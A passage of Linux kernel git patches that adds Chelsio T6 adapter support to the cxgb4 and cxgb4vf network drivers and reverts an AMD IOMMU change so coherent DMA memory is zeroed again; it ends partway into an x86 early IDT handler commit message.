((CHELSIO_CHIP_VERSION(adap->params.chip) > CHELSIO_T5) && + (vrt & KEYEXTEND_F) && (KEYMODE_G(vrt) == 3)) + rss_key_addr_cnt = 32; + t4_write_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, TP_RSS_SECRET_KEY0_A); - if (idx >= 0 && idx < 16) - t4_write_reg(adap, TP_RSS_CONFIG_VRT_A, - KEYWRADDR_V(idx) | KEYWREN_F); + + if (idx >= 0 && idx < rss_key_addr_cnt) { + if (rss_key_addr_cnt > 16) + t4_write_reg(adap, TP_RSS_CONFIG_VRT_A, + KEYWRADDRX_V(idx >> 4) | + T6_VFWRADDR_V(idx) | KEYWREN_F); + else + t4_write_reg(adap, 
TP_RSS_CONFIG_VRT_A, + KEYWRADDR_V(idx) | KEYWREN_F); + } } /** @@ -3630,8 +3686,13 @@ void t4_read_rss_vf_config(struct adapter *adapter, unsigned int index, { u32 vrt, mask, data; - mask = VFWRADDR_V(VFWRADDR_M); - data = VFWRADDR_V(index); + if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) { + mask = VFWRADDR_V(VFWRADDR_M); + data = VFWRADDR_V(index); + } else { + mask = T6_VFWRADDR_V(T6_VFWRADDR_M); + data = T6_VFWRADDR_V(index); + } /* Request that the index'th VF Table values be read into VFL/VFH. */ @@ -5142,45 +5203,71 @@ int t4_alloc_mac_filt(struct adapter *adap, unsigned int mbox, unsigned int viid, bool free, unsigned int naddr, const u8 **addr, u16 *idx, u64 *hash, bool sleep_ok) { - int i, ret; + int offset, ret = 0; struct fw_vi_mac_cmd c; - struct fw_vi_mac_exact *p; - unsigned int max_naddr = is_t4(adap->params.chip) ? - NUM_MPS_CLS_SRAM_L_INSTANCES : - NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + unsigned int nfilters = 0; + unsigned int max_naddr = adap->params.arch.mps_tcam_size; + unsigned int rem = naddr; - if (naddr > 7) + if (naddr > max_naddr) return -EINVAL; - memset(&c, 0, sizeof(c)); - c.op_to_viid = cpu_to_be32(FW_CMD_OP_V(FW_VI_MAC_CMD) | - FW_CMD_REQUEST_F | FW_CMD_WRITE_F | - (free ? FW_CMD_EXEC_F : 0) | - FW_VI_MAC_CMD_VIID_V(viid)); - c.freemacs_to_len16 = cpu_to_be32(FW_VI_MAC_CMD_FREEMACS_V(free) | - FW_CMD_LEN16_V((naddr + 2) / 2)); - - for (i = 0, p = c.u.exact; i < naddr; i++, p++) { - p->valid_to_idx = - cpu_to_be16(FW_VI_MAC_CMD_VALID_F | - FW_VI_MAC_CMD_IDX_V(FW_VI_MAC_ADD_MAC)); - memcpy(p->macaddr, addr[i], sizeof(p->macaddr)); - } + for (offset = 0; offset < naddr ; /**/) { + unsigned int fw_naddr = (rem < ARRAY_SIZE(c.u.exact) ? + rem : ARRAY_SIZE(c.u.exact)); + size_t len16 = DIV_ROUND_UP(offsetof(struct fw_vi_mac_cmd, + u.exact[fw_naddr]), 16); + struct fw_vi_mac_exact *p; + int i; - ret = t4_wr_mbox_meat(adap, mbox, &c, sizeof(c), &c, sleep_ok); - if (ret) - return ret; + memset(&c, 0, sizeof(c)); + c.op_to_viid = cpu_to_be32(FW_CMD_OP_V(FW_VI_MAC_CMD) | + FW_CMD_REQUEST_F | + FW_CMD_WRITE_F | + FW_CMD_EXEC_V(free) | + FW_VI_MAC_CMD_VIID_V(viid)); + c.freemacs_to_len16 = + cpu_to_be32(FW_VI_MAC_CMD_FREEMACS_V(free) | + FW_CMD_LEN16_V(len16)); + + for (i = 0, p = c.u.exact; i < fw_naddr; i++, p++) { + p->valid_to_idx = + cpu_to_be16(FW_VI_MAC_CMD_VALID_F | + FW_VI_MAC_CMD_IDX_V( + FW_VI_MAC_ADD_MAC)); + memcpy(p->macaddr, addr[offset + i], + sizeof(p->macaddr)); + } - for (i = 0, p = c.u.exact; i < naddr; i++, p++) { - u16 index = FW_VI_MAC_CMD_IDX_G(be16_to_cpu(p->valid_to_idx)); + /* It's okay if we run out of space in our MAC address arena. + * Some of the addresses we submit may get stored so we need + * to run through the reply to see what the results were ... + */ + ret = t4_wr_mbox_meat(adap, mbox, &c, sizeof(c), &c, sleep_ok); + if (ret && ret != -FW_ENOMEM) + break; - if (idx) - idx[i] = index >= max_naddr ? 0xffff : index; - if (index < max_naddr) - ret++; - else if (hash) - *hash |= (1ULL << hash_mac_addr(addr[i])); + for (i = 0, p = c.u.exact; i < fw_naddr; i++, p++) { + u16 index = FW_VI_MAC_CMD_IDX_G( + be16_to_cpu(p->valid_to_idx)); + + if (idx) + idx[offset + i] = (index >= max_naddr ? 
+ 0xffff : index); + if (index < max_naddr) + nfilters++; + else if (hash) + *hash |= (1ULL << + hash_mac_addr(addr[offset + i])); + } + + free = false; + offset += fw_naddr; + rem -= fw_naddr; } + + if (ret == 0 || ret == -FW_ENOMEM) + ret = nfilters; return ret; } @@ -5209,9 +5296,7 @@ int t4_change_mac(struct adapter *adap, unsigned int mbox, unsigned int viid, int ret, mode; struct fw_vi_mac_cmd c; struct fw_vi_mac_exact *p = c.u.exact; - unsigned int max_mac_addr = is_t4(adap->params.chip) ? - NUM_MPS_CLS_SRAM_L_INSTANCES : - NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + unsigned int max_mac_addr = adap->params.arch.mps_tcam_size; if (idx < 0) /* new allocation */ idx = persist ? FW_VI_MAC_ADD_PERSIST_MAC : FW_VI_MAC_ADD_MAC; @@ -5620,9 +5705,30 @@ int t4_prep_adapter(struct adapter *adapter) switch (ver) { case CHELSIO_T4: adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T4, pl_rev); + adapter->params.arch.sge_fl_db = DBPRIO_F; + adapter->params.arch.mps_tcam_size = + NUM_MPS_CLS_SRAM_L_INSTANCES; + adapter->params.arch.mps_rplc_size = 128; + adapter->params.arch.nchan = NCHAN; + adapter->params.arch.vfcount = 128; break; case CHELSIO_T5: adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T5, pl_rev); + adapter->params.arch.sge_fl_db = DBPRIO_F | DBTYPE_F; + adapter->params.arch.mps_tcam_size = + NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + adapter->params.arch.mps_rplc_size = 128; + adapter->params.arch.nchan = NCHAN; + adapter->params.arch.vfcount = 128; + break; + case CHELSIO_T6: + adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T6, pl_rev); + adapter->params.arch.sge_fl_db = 0; + adapter->params.arch.mps_tcam_size = + NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + adapter->params.arch.mps_rplc_size = 256; + adapter->params.arch.nchan = 2; + adapter->params.arch.vfcount = 256; break; default: dev_err(adapter->pdev_dev, "Device %d is not supported\n", diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_msg.h b/drivers/net/ethernet/chelsio/cxgb4/t4_msg.h index d90f8a03e378..132cb8fc0bf7 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_msg.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_msg.h @@ -686,6 +686,9 @@ struct cpl_tx_pkt { #define TXPKT_ETHHDR_LEN_S 34 #define TXPKT_ETHHDR_LEN_V(x) ((__u64)(x) << TXPKT_ETHHDR_LEN_S) +#define T6_TXPKT_ETHHDR_LEN_S 32 +#define T6_TXPKT_ETHHDR_LEN_V(x) ((__u64)(x) << T6_TXPKT_ETHHDR_LEN_S) + #define TXPKT_CSUM_TYPE_S 40 #define TXPKT_CSUM_TYPE_V(x) ((__u64)(x) << TXPKT_CSUM_TYPE_S) diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h index 326674b19983..c7fc3d3068f9 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h @@ -418,6 +418,20 @@ #define SGE_INGRESS_QUEUES_PER_PAGE_PF_A 0x10f4 #define SGE_INGRESS_QUEUES_PER_PAGE_VF_A 0x10f8 +#define SGE_ERROR_STATS_A 0x1100 + +#define UNCAPTURED_ERROR_S 18 +#define UNCAPTURED_ERROR_V(x) ((x) << UNCAPTURED_ERROR_S) +#define UNCAPTURED_ERROR_F UNCAPTURED_ERROR_V(1U) + +#define ERROR_QID_VALID_S 17 +#define ERROR_QID_VALID_V(x) ((x) << ERROR_QID_VALID_S) +#define ERROR_QID_VALID_F ERROR_QID_VALID_V(1U) + +#define ERROR_QID_S 0 +#define ERROR_QID_M 0x1ffffU +#define ERROR_QID_G(x) (((x) >> ERROR_QID_S) & ERROR_QID_M) + #define HP_INT_THRESH_S 28 #define HP_INT_THRESH_M 0xfU #define HP_INT_THRESH_V(x) ((x) << HP_INT_THRESH_S) @@ -705,6 +719,10 @@ #define REGISTER_S 0 #define REGISTER_V(x) ((x) << REGISTER_S) +#define T6_ENABLE_S 31 +#define T6_ENABLE_V(x) ((x) << T6_ENABLE_S) +#define T6_ENABLE_F T6_ENABLE_V(1U) + #define PFNUM_S 0 
#define PFNUM_V(x) ((x) << PFNUM_S) @@ -2054,6 +2072,11 @@ #define VFLKPIDX_M 0xffU #define VFLKPIDX_G(x) (((x) >> VFLKPIDX_S) & VFLKPIDX_M) +#define T6_VFWRADDR_S 8 +#define T6_VFWRADDR_M 0xffU +#define T6_VFWRADDR_V(x) ((x) << T6_VFWRADDR_S) +#define T6_VFWRADDR_G(x) (((x) >> T6_VFWRADDR_S) & T6_VFWRADDR_M) + #define TP_RSS_CONFIG_CNG_A 0x7e04 #define TP_RSS_SECRET_KEY0_A 0x40 #define TP_RSS_PF0_CONFIG_A 0x30 @@ -2175,7 +2198,28 @@ #define MPS_RX_PERR_INT_CAUSE_A 0x11074 #define MPS_CLS_TCAM_Y_L_A 0xf000 +#define MPS_CLS_TCAM_DATA0_A 0xf000 +#define MPS_CLS_TCAM_DATA1_A 0xf004 + +#define DMACH_S 0 +#define DMACH_M 0xffffU +#define DMACH_G(x) (((x) >> DMACH_S) & DMACH_M) + #define MPS_CLS_TCAM_X_L_A 0xf008 +#define MPS_CLS_TCAM_DATA2_CTL_A 0xf008 + +#define CTLCMDTYPE_S 31 +#define CTLCMDTYPE_V(x) ((x) << CTLCMDTYPE_S) +#define CTLCMDTYPE_F CTLCMDTYPE_V(1U) + +#define CTLTCAMSEL_S 25 +#define CTLTCAMSEL_V(x) ((x) << CTLTCAMSEL_S) + +#define CTLTCAMINDEX_S 17 +#define CTLTCAMINDEX_V(x) ((x) << CTLTCAMINDEX_S) + +#define CTLXYBITSEL_S 16 +#define CTLXYBITSEL_V(x) ((x) << CTLXYBITSEL_S) #define MPS_CLS_TCAM_Y_L(idx) (MPS_CLS_TCAM_Y_L_A + (idx) * 16) #define NUM_MPS_CLS_TCAM_Y_L_INSTANCES 512 @@ -2184,6 +2228,45 @@ #define NUM_MPS_CLS_TCAM_X_L_INSTANCES 512 #define MPS_CLS_SRAM_L_A 0xe000 + +#define T6_MULTILISTEN0_S 26 + +#define T6_SRAM_PRIO3_S 23 +#define T6_SRAM_PRIO3_M 0x7U +#define T6_SRAM_PRIO3_G(x) (((x) >> T6_SRAM_PRIO3_S) & T6_SRAM_PRIO3_M) + +#define T6_SRAM_PRIO2_S 20 +#define T6_SRAM_PRIO2_M 0x7U +#define T6_SRAM_PRIO2_G(x) (((x) >> T6_SRAM_PRIO2_S) & T6_SRAM_PRIO2_M) + +#define T6_SRAM_PRIO1_S 17 +#define T6_SRAM_PRIO1_M 0x7U +#define T6_SRAM_PRIO1_G(x) (((x) >> T6_SRAM_PRIO1_S) & T6_SRAM_PRIO1_M) + +#define T6_SRAM_PRIO0_S 14 +#define T6_SRAM_PRIO0_M 0x7U +#define T6_SRAM_PRIO0_G(x) (((x) >> T6_SRAM_PRIO0_S) & T6_SRAM_PRIO0_M) + +#define T6_SRAM_VLD_S 13 +#define T6_SRAM_VLD_V(x) ((x) << T6_SRAM_VLD_S) +#define T6_SRAM_VLD_F T6_SRAM_VLD_V(1U) + +#define T6_REPLICATE_S 12 +#define T6_REPLICATE_V(x) ((x) << T6_REPLICATE_S) +#define T6_REPLICATE_F T6_REPLICATE_V(1U) + +#define T6_PF_S 9 +#define T6_PF_M 0x7U +#define T6_PF_G(x) (((x) >> T6_PF_S) & T6_PF_M) + +#define T6_VF_VALID_S 8 +#define T6_VF_VALID_V(x) ((x) << T6_VF_VALID_S) +#define T6_VF_VALID_F T6_VF_VALID_V(1U) + +#define T6_VF_S 0 +#define T6_VF_M 0xffU +#define T6_VF_G(x) (((x) >> T6_VF_S) & T6_VF_M) + #define MPS_CLS_SRAM_H_A 0xe004 #define MPS_CLS_SRAM_L(idx) (MPS_CLS_SRAM_L_A + (idx) * 8) @@ -2433,6 +2516,8 @@ #define CIM_F CIM_V(1U) #define MC1_S 31 +#define MC1_V(x) ((x) << MC1_S) +#define MC1_F MC1_V(1U) #define PL_INT_ENABLE_A 0x19410 #define PL_INT_MAP0_A 0x19414 @@ -2463,6 +2548,18 @@ #define REV_V(x) ((x) << REV_S) #define REV_G(x) (((x) >> REV_S) & REV_M) +#define T6_UNKNOWNCMD_S 3 +#define T6_UNKNOWNCMD_V(x) ((x) << T6_UNKNOWNCMD_S) +#define T6_UNKNOWNCMD_F T6_UNKNOWNCMD_V(1U) + +#define T6_LIP0_S 2 +#define T6_LIP0_V(x) ((x) << T6_LIP0_S) +#define T6_LIP0_F T6_LIP0_V(1U) + +#define T6_LIPMISS_S 1 +#define T6_LIPMISS_V(x) ((x) << T6_LIPMISS_S) +#define T6_LIPMISS_F T6_LIPMISS_V(1U) + #define LE_DB_INT_CAUSE_A 0x19c3c #define REQQPARERR_S 16 @@ -2485,6 +2582,14 @@ #define LIP0_V(x) ((x) << LIP0_S) #define LIP0_F LIP0_V(1U) +#define TCAMINTPERR_S 13 +#define TCAMINTPERR_V(x) ((x) << TCAMINTPERR_S) +#define TCAMINTPERR_F TCAMINTPERR_V(1U) + +#define SSRAMINTPERR_S 10 +#define SSRAMINTPERR_V(x) ((x) << SSRAMINTPERR_S) +#define SSRAMINTPERR_F SSRAMINTPERR_V(1U) + #define NCSI_INT_CAUSE_A 0x1a0d8 #define 
CIM_DM_PRTY_ERR_S 8 diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_values.h b/drivers/net/ethernet/chelsio/cxgb4/t4_values.h index 72ec1f91d29f..7bdee3bf75ec 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_values.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_values.h @@ -63,6 +63,7 @@ #define FETCHBURSTMIN_64B_X 2 +#define FETCHBURSTMAX_256B_X 2 #define FETCHBURSTMAX_512B_X 3 #define HOSTFCMODE_STATUS_PAGE_X 2 diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h b/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h index 0848317e5c4f..aceb1e8cacc8 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h @@ -788,15 +788,27 @@ struct fw_ldst_cmd { __be16 vctl; __be16 rval; } mdio; - struct fw_ldst_mps { - __be16 fid_ctl; - __be16 rplcpf_pkd; - __be32 rplc127_96; - __be32 rplc95_64; - __be32 rplc63_32; - __be32 rplc31_0; - __be32 atrb; - __be16 vlan[16]; + union fw_ldst_mps { + struct fw_ldst_mps_rplc { + __be16 fid_idx; + __be16 rplcpf_pkd; + __be32 rplc255_224; + __be32 rplc223_192; + __be32 rplc191_160; + __be32 rplc159_128; + __be32 rplc127_96; + __be32 rplc95_64; + __be32 rplc63_32; + __be32 rplc31_0; + } rplc; + struct fw_ldst_mps_atrb { + __be16 fid_mpsid; + __be16 r2[3]; + __be32 r3[2]; + __be32 r4; + __be32 atrb; + __be16 vlan[16]; + } atrb; } mps; struct fw_ldst_func { u8 access_ctl; @@ -831,8 +843,8 @@ struct fw_ldst_cmd { #define FW_LDST_CMD_FID_S 15 #define FW_LDST_CMD_FID_V(x) ((x) << FW_LDST_CMD_FID_S) -#define FW_LDST_CMD_CTL_S 0 -#define FW_LDST_CMD_CTL_V(x) ((x) << FW_LDST_CMD_CTL_S) +#define FW_LDST_CMD_IDX_S 0 +#define FW_LDST_CMD_IDX_V(x) ((x) << FW_LDST_CMD_IDX_S) #define FW_LDST_CMD_RPLCPF_S 0 #define FW_LDST_CMD_RPLCPF_V(x) ((x) << FW_LDST_CMD_RPLCPF_S) @@ -2536,13 +2548,8 @@ enum fw_port_mod_sub_type { FW_PORT_MOD_SUB_TYPE_TWINAX_7 = 0xC, }; -/* port stats */ -#define FW_NUM_PORT_STATS 50 -#define FW_NUM_PORT_TX_STATS 23 -#define FW_NUM_PORT_RX_STATS 27 - enum fw_port_stats_tx_index { - FW_STAT_TX_PORT_BYTES_IX, + FW_STAT_TX_PORT_BYTES_IX = 0, FW_STAT_TX_PORT_FRAMES_IX, FW_STAT_TX_PORT_BCAST_IX, FW_STAT_TX_PORT_MCAST_IX, @@ -2564,11 +2571,12 @@ enum fw_port_stats_tx_index { FW_STAT_TX_PORT_PPP4_IX, FW_STAT_TX_PORT_PPP5_IX, FW_STAT_TX_PORT_PPP6_IX, - FW_STAT_TX_PORT_PPP7_IX + FW_STAT_TX_PORT_PPP7_IX, + FW_NUM_PORT_TX_STATS }; enum fw_port_stat_rx_index { - FW_STAT_RX_PORT_BYTES_IX, + FW_STAT_RX_PORT_BYTES_IX = 0, FW_STAT_RX_PORT_FRAMES_IX, FW_STAT_RX_PORT_BCAST_IX, FW_STAT_RX_PORT_MCAST_IX, @@ -2594,9 +2602,14 @@ enum fw_port_stat_rx_index { FW_STAT_RX_PORT_PPP5_IX, FW_STAT_RX_PORT_PPP6_IX, FW_STAT_RX_PORT_PPP7_IX, - FW_STAT_RX_PORT_LESS_64B_IX + FW_STAT_RX_PORT_LESS_64B_IX, + FW_STAT_RX_PORT_MAC_ERROR_IX, + FW_NUM_PORT_RX_STATS }; +/* port stats */ +#define FW_NUM_PORT_STATS (FW_NUM_PORT_TX_STATS + FW_NUM_PORT_RX_STATS) + struct fw_port_stats_cmd { __be32 op_to_portid; __be32 retval_len16; @@ -3025,7 +3038,8 @@ struct fw_hdr { enum fw_hdr_chip { FW_HDR_CHIP_T4, - FW_HDR_CHIP_T5 + FW_HDR_CHIP_T5, + FW_HDR_CHIP_T6 }; #define FW_HDR_FW_VER_MAJOR_S 24 diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4fw_version.h b/drivers/net/ethernet/chelsio/cxgb4/t4fw_version.h index b9d1cbac0eee..32b213559b02 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4fw_version.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4fw_version.h @@ -45,4 +45,9 @@ #define T5FW_VERSION_MICRO 0x20 #define T5FW_VERSION_BUILD 0x00 +#define T6FW_VERSION_MAJOR 0x01 +#define T6FW_VERSION_MINOR 0x0D +#define T6FW_VERSION_MICRO 0x2D +#define 
T6FW_VERSION_BUILD 0x00 + #endif From 41fc2e41d348a7bca768815adf033bbf00de220f Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Tue, 2 Jun 2015 13:59:40 +0530 Subject: [PATCH 580/872] cxgb4vf: Adds SRIOV driver changes for T6 adapter Adds vnic driver register related changes for T6 adapter Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4vf/sge.c | 45 ++++++++++++------- .../ethernet/chelsio/cxgb4vf/t4vf_common.h | 8 ++++ .../net/ethernet/chelsio/cxgb4vf/t4vf_hw.c | 24 +++++++--- 3 files changed, 54 insertions(+), 23 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/sge.c b/drivers/net/ethernet/chelsio/cxgb4vf/sge.c index be4ab09d11d7..ad53e5ad2acd 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4vf/sge.c @@ -524,7 +524,7 @@ static void unmap_rx_buf(struct adapter *adapter, struct sge_fl *fl) */ static inline void ring_fl_db(struct adapter *adapter, struct sge_fl *fl) { - u32 val; + u32 val = adapter->params.arch.sge_fl_db; /* The SGE keeps track of its Producer and Consumer Indices in terms * of Egress Queue Units so we can only tell it about integral numbers @@ -532,11 +532,9 @@ static inline void ring_fl_db(struct adapter *adapter, struct sge_fl *fl) */ if (fl->pend_cred >= FL_PER_EQ_UNIT) { if (is_t4(adapter->params.chip)) - val = PIDX_V(fl->pend_cred / FL_PER_EQ_UNIT); + val |= PIDX_V(fl->pend_cred / FL_PER_EQ_UNIT); else - val = PIDX_T5_V(fl->pend_cred / FL_PER_EQ_UNIT) | - DBTYPE_F; - val |= DBPRIO_F; + val |= PIDX_T5_V(fl->pend_cred / FL_PER_EQ_UNIT); /* Make sure all memory writes to the Free List queue are * committed before we tell the hardware about them. @@ -1084,7 +1082,7 @@ static void inline_tx_skb(const struct sk_buff *skb, const struct sge_txq *tq, * Figure out what HW csum a packet wants and return the appropriate control * bits. */ -static u64 hwcsum(const struct sk_buff *skb) +static u64 hwcsum(enum chip_type chip, const struct sk_buff *skb) { int csum_type; const struct iphdr *iph = ip_hdr(skb); @@ -1116,11 +1114,16 @@ static u64 hwcsum(const struct sk_buff *skb) goto nocsum; } - if (likely(csum_type >= TX_CSUM_TCPIP)) - return TXPKT_CSUM_TYPE_V(csum_type) | - TXPKT_IPHDR_LEN_V(skb_network_header_len(skb)) | - TXPKT_ETHHDR_LEN_V(skb_network_offset(skb) - ETH_HLEN); - else { + if (likely(csum_type >= TX_CSUM_TCPIP)) { + u64 hdr_len = TXPKT_IPHDR_LEN_V(skb_network_header_len(skb)); + int eth_hdr_len = skb_network_offset(skb) - ETH_HLEN; + + if (chip <= CHELSIO_T5) + hdr_len |= TXPKT_ETHHDR_LEN_V(eth_hdr_len); + else + hdr_len |= T6_TXPKT_ETHHDR_LEN_V(eth_hdr_len); + return TXPKT_CSUM_TYPE_V(csum_type) | hdr_len; + } else { int start = skb_transport_offset(skb); return TXPKT_CSUM_TYPE_V(csum_type) | @@ -1308,10 +1311,15 @@ int t4vf_eth_xmit(struct sk_buff *skb, struct net_device *dev) * accounting. */ cpl = (void *)(lso + 1); - cntrl = (TXPKT_CSUM_TYPE_V(v6 ? + + if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) + cntrl = TXPKT_ETHHDR_LEN_V(eth_xtra_len); + else + cntrl = T6_TXPKT_ETHHDR_LEN_V(eth_xtra_len); + + cntrl |= TXPKT_CSUM_TYPE_V(v6 ? 
TX_CSUM_TCPIP6 : TX_CSUM_TCPIP) | - TXPKT_IPHDR_LEN_V(l3hdr_len) | - TXPKT_ETHHDR_LEN_V(eth_xtra_len)); + TXPKT_IPHDR_LEN_V(l3hdr_len); txq->tso++; txq->tx_cso += ssi->gso_segs; } else { @@ -1328,7 +1336,8 @@ int t4vf_eth_xmit(struct sk_buff *skb, struct net_device *dev) */ cpl = (void *)(wr + 1); if (skb->ip_summed == CHECKSUM_PARTIAL) { - cntrl = hwcsum(skb) | TXPKT_IPCSUM_DIS_F; + cntrl = hwcsum(adapter->params.chip, skb) | + TXPKT_IPCSUM_DIS_F; txq->tx_cso++; } else cntrl = TXPKT_L4CSUM_DIS_F | TXPKT_IPCSUM_DIS_F; @@ -2247,6 +2256,8 @@ int t4vf_sge_alloc_rxq(struct adapter *adapter, struct sge_rspq *rspq, cmd.iqaddr = cpu_to_be64(rspq->phys_addr); if (fl) { + enum chip_type chip = + CHELSIO_CHIP_VERSION(adapter->params.chip); /* * Allocate the ring for the hardware free list (with space * for its status page) along with the associated software @@ -2286,7 +2297,9 @@ int t4vf_sge_alloc_rxq(struct adapter *adapter, struct sge_rspq *rspq, cmd.fl0dcaen_to_fl0cidxfthresh = cpu_to_be16( FW_IQ_CMD_FL0FBMIN_V(SGE_FETCHBURSTMIN_64B) | - FW_IQ_CMD_FL0FBMAX_V(SGE_FETCHBURSTMAX_512B)); + FW_IQ_CMD_FL0FBMAX_V((chip <= CHELSIO_T5) ? + FETCHBURSTMAX_512B_X : + FETCHBURSTMAX_256B_X)); cmd.fl0size = cpu_to_be16(flsz); cmd.fl0addr = cpu_to_be64(fl->addr); } diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h index 75df25970d5e..88b8981b4751 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h +++ b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h @@ -51,6 +51,7 @@ */ #define CHELSIO_T4 0x4 #define CHELSIO_T5 0x5 +#define CHELSIO_T6 0x6 enum chip_type { T4_A1 = CHELSIO_CHIP_CODE(CHELSIO_T4, 1), @@ -156,6 +157,12 @@ struct vpd_params { u32 cclk; /* Core Clock (KHz) */ }; +/* Stores chip specific parameters */ +struct arch_specific_params { + u32 sge_fl_db; + u16 mps_tcam_size; +}; + /* * Global Receive Side Scaling (RSS) parameters in host-native format. */ @@ -215,6 +222,7 @@ struct adapter_params { struct vpd_params vpd; /* Vital Product Data */ struct rss_params rss; /* Receive Side Scaling */ struct vf_resources vfres; /* Virtual Function Resource limits */ + struct arch_specific_params arch; /* chip specific params */ enum chip_type chip; /* chip code */ u8 nports; /* # of Ethernet "ports" */ }; diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c index 135909ecbc0f..0db6dc9e9ed2 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c @@ -1191,9 +1191,7 @@ int t4vf_alloc_mac_filt(struct adapter *adapter, unsigned int viid, bool free, unsigned nfilters = 0; unsigned int rem = naddr; struct fw_vi_mac_cmd cmd, rpl; - unsigned int max_naddr = is_t4(adapter->params.chip) ? - NUM_MPS_CLS_SRAM_L_INSTANCES : - NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + unsigned int max_naddr = adapter->params.arch.mps_tcam_size; if (naddr > max_naddr) return -EINVAL; @@ -1285,9 +1283,7 @@ int t4vf_change_mac(struct adapter *adapter, unsigned int viid, struct fw_vi_mac_exact *p = &cmd.u.exact[0]; size_t len16 = DIV_ROUND_UP(offsetof(struct fw_vi_mac_cmd, u.exact[1]), 16); - unsigned int max_naddr = is_t4(adapter->params.chip) ? 
- NUM_MPS_CLS_SRAM_L_INSTANCES : - NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + unsigned int max_mac_addr = adapter->params.arch.mps_tcam_size; /* * If this is a new allocation, determine whether it should be @@ -1310,7 +1306,7 @@ int t4vf_change_mac(struct adapter *adapter, unsigned int viid, if (ret == 0) { p = &rpl.u.exact[0]; ret = FW_VI_MAC_CMD_IDX_G(be16_to_cpu(p->valid_to_idx)); - if (ret >= max_naddr) + if (ret >= max_mac_addr) ret = -ENOMEM; } return ret; @@ -1590,11 +1586,25 @@ int t4vf_prep_adapter(struct adapter *adapter) switch (CHELSIO_PCI_ID_VER(adapter->pdev->device)) { case CHELSIO_T4: adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T4, 0); + adapter->params.arch.sge_fl_db = DBPRIO_F; + adapter->params.arch.mps_tcam_size = + NUM_MPS_CLS_SRAM_L_INSTANCES; break; case CHELSIO_T5: chipid = REV_G(t4_read_reg(adapter, PL_VF_REV_A)); adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T5, chipid); + adapter->params.arch.sge_fl_db = DBPRIO_F | DBTYPE_F; + adapter->params.arch.mps_tcam_size = + NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + break; + + case CHELSIO_T6: + chipid = REV_G(t4_read_reg(adapter, PL_VF_REV_A)); + adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T6, chipid); + adapter->params.arch.sge_fl_db = 0; + adapter->params.arch.mps_tcam_size = + NUM_MPS_T5_CLS_SRAM_L_INSTANCES; break; } From 2d0ec7a19b5796aa958636eeeff072b506460501 Mon Sep 17 00:00:00 2001 From: Joerg Roedel Date: Mon, 1 Jun 2015 17:30:57 +0200 Subject: [PATCH 581/872] Revert "iommu/amd: Don't allocate with __GFP_ZERO in alloc_coherent" This reverts commit 5fc872c7323534e8f7dc21bab635e7a9b9659e07. The DMA-API does not strictly require that the memory returned by dma_alloc_coherent is zeroed out. For that another function (dma_zalloc_coherent) should be used. But all other x86 DMA-API implementation I checked zero out the memory, so that some drivers rely on it and break when it is not. It seems the (driver-)world is not yet ready for this change, so revert it. Signed-off-by: Joerg Roedel --- drivers/iommu/amd_iommu.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/iommu/amd_iommu.c b/drivers/iommu/amd_iommu.c index e43d48956dea..e1c7e9e51045 100644 --- a/drivers/iommu/amd_iommu.c +++ b/drivers/iommu/amd_iommu.c @@ -2930,6 +2930,7 @@ static void *alloc_coherent(struct device *dev, size_t size, size = PAGE_ALIGN(size); dma_mask = dev->coherent_dma_mask; flag &= ~(__GFP_DMA | __GFP_HIGHMEM | __GFP_DMA32); + flag |= __GFP_ZERO; page = alloc_pages(flag | __GFP_NOWARN, get_order(size)); if (!page) { From 425be5679fd292a3c36cb1fe423086708a99f11a Mon Sep 17 00:00:00 2001 From: Andy Lutomirski Date: Fri, 22 May 2015 16:15:47 -0700 Subject: [PATCH 582/872] x86/asm/irq: Stop relying on magic JMP behavior for early_idt_handlers The early_idt_handlers asm code generates an array of entry points spaced nine bytes apart. It's not really clear from that code or from the places that reference it 